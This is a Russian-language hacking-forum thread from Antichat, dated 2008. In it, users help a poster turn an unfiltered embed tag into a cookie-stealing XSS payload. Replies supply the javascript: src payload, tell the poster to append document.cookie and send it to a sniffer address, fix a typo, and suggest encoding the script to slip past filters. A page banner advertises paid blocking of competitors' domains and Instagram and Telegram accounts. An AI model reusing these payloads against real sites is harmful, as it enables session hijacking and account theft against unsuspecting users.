Форум АНТИЧАТ - использование тега embed для угона cookies ?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
использование тега embed для угона cookies ?

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

использование тега embed для угона cookies ?

14.12.2008, 00:51

ickhz

Новичок

Регистрация: 01.12.2008

Сообщений: 7

Провел на форуме:
9272

Репутация: 0

использование тега embed для угона cookies ?

Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.

14.12.2008, 00:53

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

также, как и обычно

14.12.2008, 01:06

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.

14.12.2008, 01:07

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>

14.12.2008, 01:16

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

+document.cookie

14.12.2008, 01:19

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Бля,точно,пропустил

спс за поправку!

14.12.2008, 01:29

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше...

15.12.2008, 18:06

ickhz

Новичок

Регистрация: 01.12.2008

Сообщений: 7

Провел на форуме:
9272

Репутация: 0

А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

alert(document.cookies) выдает вместо cookies undefined

Типа защита такая что-ли))))

15.12.2008, 19:31

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

#10

15.12.2008, 19:34

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Создание сети: обжимка проводов	petrovich-lamer	Windows	13	02.07.2007 13:18
Программы для работы с железом. Часть I – настройка видеокарт	_GaLs_	Аппаратное обеспечение	2	20.12.2006 01:18
"Доктор Веб" выпустила новые версии антивирусов для ОС Unix/Linux	TTN_	Мировые новости	0	31.08.2006 21:20
ОТЛИЧНАЯ СТАТЬЯ - "Как заметать следы"	foreva	Чужие Статьи	8	07.02.2005 12:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход